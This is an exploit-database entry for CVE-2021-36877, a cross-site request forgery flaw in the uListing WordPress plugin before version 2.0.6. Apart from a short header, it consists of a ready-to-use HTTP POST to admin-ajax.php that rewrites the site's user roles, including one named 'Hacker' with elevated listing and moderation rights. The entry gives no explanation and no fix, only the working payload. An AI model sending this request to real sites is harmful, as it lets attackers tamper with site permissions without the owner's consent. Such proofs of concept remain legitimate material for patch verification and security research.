Exploit for uListing < 2.0.6 - Modify User Roles via CSRF CVE-2021-36877

Name: Exploit for uListing < 2.0.6 - Modify User Roles via CSRF CVE-2021-36877
Rating: 5 (294 reviews)

2021-07-27 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:2DB89FD2-C774-42ED-946D-85A9C20DC16E
PoC | CSRF | Add/Edit User Roles:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 933

action=stm_save_user_roles&roles%5B0%5D%5Bis_delete%5D=0&roles%5B0%5D%5Bname%5D=Agency&roles%5B0%5D%5Bslug%5D=agency&roles%5B0%5D%5Bcapabilities%5D%5Bdefault%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Blisting_limit%5D=1553&roles%5B0%5D%5Bcapabilities%5D%5Bcomment%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Blisting_moderation%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Bstm_listing_role%5D=1&roles%5B0%5D%5Bcapabilities%5D%5Bis_open%5D=1&roles%5B1%5D%5Bis_delete%5D=0&roles%5B1%5D%5Bname%5D=Hacker&roles%5B1%5D%5Bslug%5D=hacker&roles%5B1%5D%5Bcapabilities%5D%5Bdefault%5D=1&roles%5B1%5D%5Bcapabilities%5D%5Blisting_limit%5D=31337&roles%5B1%5D%5Bcapabilities%5D%5Blisting_moderation%5D=1&roles%5B1%5D%5Bcapabilities%5D%5Bstm_listing_role%5D=1&roles%5B1%5D%5Bcapabilities%5D%5Ballow_delete_listings%5D=0&roles%5B1%5D%5Bcapabilities%5D%5Bcomment%5D=true